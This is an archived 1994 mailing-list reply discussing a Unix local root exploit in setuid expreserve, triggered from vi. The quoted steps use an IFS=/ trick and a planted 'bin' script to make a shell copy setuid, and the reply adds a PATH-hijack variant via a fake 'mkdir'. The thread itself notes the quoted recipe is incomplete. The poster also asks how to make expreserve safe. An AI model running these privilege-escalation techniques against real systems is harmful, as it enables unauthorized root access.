Re: chmod 000 .rhosts - works?

• Messages sorted by: [ date ][ thread ][ subject ][ author ]
• Next message: Joe Konczal: "Re: Internet Worm"
• Previous message: Steve Kotsopoulos: "Re: Directory Permissions"
• In reply to: Charles Howes: "Re: chmod 000 .rhosts - works?"
• Next in thread: John Abreau: "Re: chmod 000 .rhosts - works?"

Charles Howes writes:
> On Sun, 16 Oct 1994, Chris Ellwood wrote:
> > Charles Howes said...
> > > ObBug: vi runs expreserve when it crashes or you type ':pre' (on some
> > >   versions).  Expreserve is setuid root.  Expreserve runs /bin/mail
> > >   with 'system()'.  So, do the following:
> > >     % cd /tmp
> > >     % cp /bin/sh fubar
> > >     % cat > bin
> > >     chmod 4755 fubar
> > >     ^D
> > >     % chmod u+x fubar
> > 
> > I see a couple problems with the script so far.  /bin/sh was copied
> > to fubar while you are a regular user, so it will be owned by you
> > and you'll end up with a nice copy of /bin/sh that's setuid to you,
> > not your target user.  Also, that last line should probably read 
> > 'chmod u+x bin', not fubar.
> 
> Ooops, forgot the chown.  Sigh.  Trust memory to lose things.
> 
> > >     % setenv IFS=/
> > >     % vi
> > >     :pre
> > >     :q
> > >     % fubar
> > >     #
> > >   Some versions of expreserve don't have the hole.
> > >   Some versions of vi don't have the :pre command.
> > >   One does not imply the other.

Better still are the versions of expreserve that do a
system("mkdir ....");
Create a file called "mkdir" and put "." in your path.

Just out of interest, what is needed to make it safe?  Is making it
non-setuid/setgid and /usr/preserve mode 1777 sufficient?

Is there any way of subverting the "expreserve -" from the boot
scripts?

-Peter

• Next message: Joe Konczal: "Re: Internet Worm"
• Previous message: Steve Kotsopoulos: "Re: Directory Permissions"
• In reply to: Charles Howes: "Re: chmod 000 .rhosts - works?"
• Next in thread: John Abreau: "Re: chmod 000 .rhosts - works?"